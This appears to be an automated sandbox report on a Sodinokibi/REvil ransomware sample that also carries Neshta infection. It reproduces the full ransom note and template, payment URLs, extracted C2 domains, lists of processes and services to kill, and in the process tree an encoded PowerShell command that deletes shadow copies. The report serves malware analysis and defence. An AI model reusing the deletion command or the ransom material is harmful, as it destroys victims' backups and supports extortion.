Analysis

  • max time kernel
    145s
  • max time network
    180s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:57

General

  • Target

    d63869bf2b12dc35d728a2a269a2d4cf15090da9ef60cb71970b612bd471f702.exe

  • Size

    207KB

  • MD5

    d8ca09c047a38fd9993cd6d030e5e293

  • SHA1

    046299455140c883bcc8867e2ba3d5fed38a769c

  • SHA256

    d63869bf2b12dc35d728a2a269a2d4cf15090da9ef60cb71970b612bd471f702

  • SHA512

    eb34487aa7cb530bafc75e8b6bfadf0e8bcc89a9c69910a6ce1f78f11f86c98fd2222863a91b5ad5abd796ea53efd665b50cc63e10665ec59075bb3dac91df15

Malware Config

Extracted

Path

C:\cvz7cva-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion cvz7cva. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/732B56D31BE5F2B9 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/732B56D31BE5F2B9 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: loiMKPGM6WPforKV3Tdxn0+BJuu3JhOutuJDtx2sG4c/Ka1zgs1k7iA0SANZHw5t HPBIHAr3QQT5EydpDFek0MyF8ln59fgofPlUlI3CtDNMTsrJvG6GuioZng3dLLhc EobKNUgFTFr5g/XxUFS817wGlbrsh+BQ1yE/xb79yMZgp5uJWGegl1SVjUW98+cd y4yrdlmV1B/ZX5SRFCv2x2drf3rsnOY2lFqrTqLDlZvifcqkDLIbE/yQ5ZKd7gmi bFzfBl/NjZk2osGssRRKyGzo1WjZer9fQLrebJ7kY7CN/K7xC66YhinbcVX4bTqe kBRYEo8NZpmL0AQtElxfcmzBsu6B9Wv+W4CamjzNCgcQ1RlOh43tvdgVAJXzWeU3 EqPpciafWg/SBX+/YGDu6TNfZjVA5XO06gnmhxcApf2p1BrgFmBswURCFUX23qAH Ms0ajpkRjXTMSE4cK8t+xCY20IbF44NIRWeOjxOiVch+Vmt7T2Wi7wPqX4jvOQJ7 zte1/4J5YwEd0Ll1jfm0ofezz8TUw06IrEtmN9UxvC2p/jPIMJ9m4Gs5pGzBSVli f+rsro4CNdDgr7n+tqxd733xDQbukIDZEMxzzyKfcK5rxI53LIJCp64EKud7V0Fm K8r7FdLdLv08C774JuG2diLKZ0AM33+F8S1I13HucfsOfzU3KS3CioxiuK4nY1qQ 70wIvHYnkeE7xhzL1txPSFV6Ewz51yNwcq6KGpJ5tpjoi6Qq4be02YSceGAFRnJ5 nka9ISeQw/68CkalGTETkZijjF/2TTbpxLtwcFCUSTGFnW26+hOZRrmhK6i88NlX 3ac5VIM1QoUHkbX+Usb1kf77Z6HcAoYqOrVKMy3ehGCWshZOEfVfZ+amZZ4xJvKB 4Xnx6iJ/jnDQ5KyFBSbiLAXt9A4SFdO3aulbXJeLZbu2NyECqlQCptti9Y1klED4 2abhHQocwE+79ePE9wyl6m1VnpQH11e+rALVA7FRsK9G6CNw5Lzp4sX3dt8ZUSoA uW/9K/J9gH6Hnu1SM9lPDvAxSdz8lBEGeSqjjaUyWciAWb4GmzPNOkBVunF598tp esZQTJPpH/+/7ZdhrVz76VZqWaJdMliq6eW713MNDcykTx93+0dDfJGudjF3iHjm afJMoyK5JJ3vk2p4oTL+Yke/g2GNzaCcj45PULiKD2RlE97MVb4kqo/IVvgGk0Fn 9dw2dNI13vHzEk/DF+cY+fCVVulh9Z1Py6QivJf3pXqVXR0OoVUjNjsfaQ4sIxU4 nju6lIDDA02SqN4Gh849zt10EHfeLg== Extension name: cvz7cva ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/732B56D31BE5F2B9

http://decryptor.cc/732B56D31BE5F2B9

Extracted

Family

sodinokibi

Botnet

$2a$10$nbe9oW69ocY6UejKfGNNA.ZHOB1ZXjsXCGNPZ2zONddD3fZPRebBy

Campaign

35

C2

carriagehousesalonvt.com

makeitcount.at

sevenadvertising.com

layrshift.eu

rerekatu.com

deepsouthclothingcompany.com

milanonotai.it

bargningavesta.se

southeasternacademyofprosthodontics.org

365questions.org

miraclediet.fun

love30-chanko.com

catholicmusicfest.com

bauertree.com

mooglee.com

charlottepoudroux-photographie.fr

lefumetdesdombes.com

qualitus.com

mercantedifiori.com

baylegacy.com

Attributes
  • net

    true

  • pid

    $2a$10$nbe9oW69ocY6UejKfGNNA.ZHOB1ZXjsXCGNPZ2zONddD3fZPRebBy

  • prc

    ocssd

    oracle

    mysqld

    mspub

    excel

    thebat

    winword

    sqlwriter

    mysqld_opt

    ocautoupds

    encsvc

    msaccess

    outlook

    onenote

    steam

    mydesktopqos

    wordpad

    powerpnt

    firefoxconfig

    dbsnmp

    synctime

    dbeng50

    agntsvc

    ocomm

    thebat64

    sqlservr

    sqlbrowser

    thunderbird

    mysqld_nt

    visio

    isqlplussvc

    sqbcoreservice

    xfssvccon

    sqlagent

    msftesql

    mydesktopservice

    infopath

    tbirdconfig

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    35

  • svc

    sql

    memtas

    sophos

    veeam

    mepocs

    backup

    vss

    svc$

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d63869bf2b12dc35d728a2a269a2d4cf15090da9ef60cb71970b612bd471f702.exe
    "C:\Users\Admin\AppData\Local\Temp\d63869bf2b12dc35d728a2a269a2d4cf15090da9ef60cb71970b612bd471f702.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1912
    • C:\Users\Admin\AppData\Local\Temp\3582-490\d63869bf2b12dc35d728a2a269a2d4cf15090da9ef60cb71970b612bd471f702.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\d63869bf2b12dc35d728a2a269a2d4cf15090da9ef60cb71970b612bd471f702.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:940
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1400
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:632

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Change Default File Association

    1
    T1042

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    3
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\d63869bf2b12dc35d728a2a269a2d4cf15090da9ef60cb71970b612bd471f702.exe
      MD5

      807aa37b0860be4ddef1e73ac8145a50

      SHA1

      3aee9a710965bcea6a9821e18874bdeca75b5d18

      SHA256

      e4ef60c5c26b80e99aceb1c2c54fee284a94216ba1f36f29489e565b1bfa1aea

      SHA512

      9e4ceb1b0f90fe12ed868b85b3c6d51187bc8f42a22e5d20b5ff232d2eef3b504544ce3b9e2fcc287f6d3cdb356185ad2d4b8a7fdcd2512915ddf0ddbf22918a

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

    • \Users\Admin\AppData\Local\Temp\3582-490\d63869bf2b12dc35d728a2a269a2d4cf15090da9ef60cb71970b612bd471f702.exe
      MD5

      807aa37b0860be4ddef1e73ac8145a50

      SHA1

      3aee9a710965bcea6a9821e18874bdeca75b5d18

      SHA256

      e4ef60c5c26b80e99aceb1c2c54fee284a94216ba1f36f29489e565b1bfa1aea

      SHA512

      9e4ceb1b0f90fe12ed868b85b3c6d51187bc8f42a22e5d20b5ff232d2eef3b504544ce3b9e2fcc287f6d3cdb356185ad2d4b8a7fdcd2512915ddf0ddbf22918a

    • \Users\Admin\AppData\Local\Temp\3582-490\d63869bf2b12dc35d728a2a269a2d4cf15090da9ef60cb71970b612bd471f702.exe
      MD5

      807aa37b0860be4ddef1e73ac8145a50

      SHA1

      3aee9a710965bcea6a9821e18874bdeca75b5d18

      SHA256

      e4ef60c5c26b80e99aceb1c2c54fee284a94216ba1f36f29489e565b1bfa1aea

      SHA512

      9e4ceb1b0f90fe12ed868b85b3c6d51187bc8f42a22e5d20b5ff232d2eef3b504544ce3b9e2fcc287f6d3cdb356185ad2d4b8a7fdcd2512915ddf0ddbf22918a

    • memory/940-59-0x000007FEFB931000-0x000007FEFB933000-memory.dmp
      Filesize

      8KB

    • memory/940-61-0x0000000002810000-0x0000000002812000-memory.dmp
      Filesize

      8KB

    • memory/940-62-0x0000000002812000-0x0000000002814000-memory.dmp
      Filesize

      8KB

    • memory/940-63-0x0000000002814000-0x0000000002817000-memory.dmp
      Filesize

      12KB

    • memory/940-60-0x000007FEF2A00000-0x000007FEF355D000-memory.dmp
      Filesize

      11.4MB

    • memory/940-64-0x000000000281B000-0x000000000283A000-memory.dmp
      Filesize

      124KB

    • memory/1912-54-0x0000000075F21000-0x0000000075F23000-memory.dmp
      Filesize

      8KB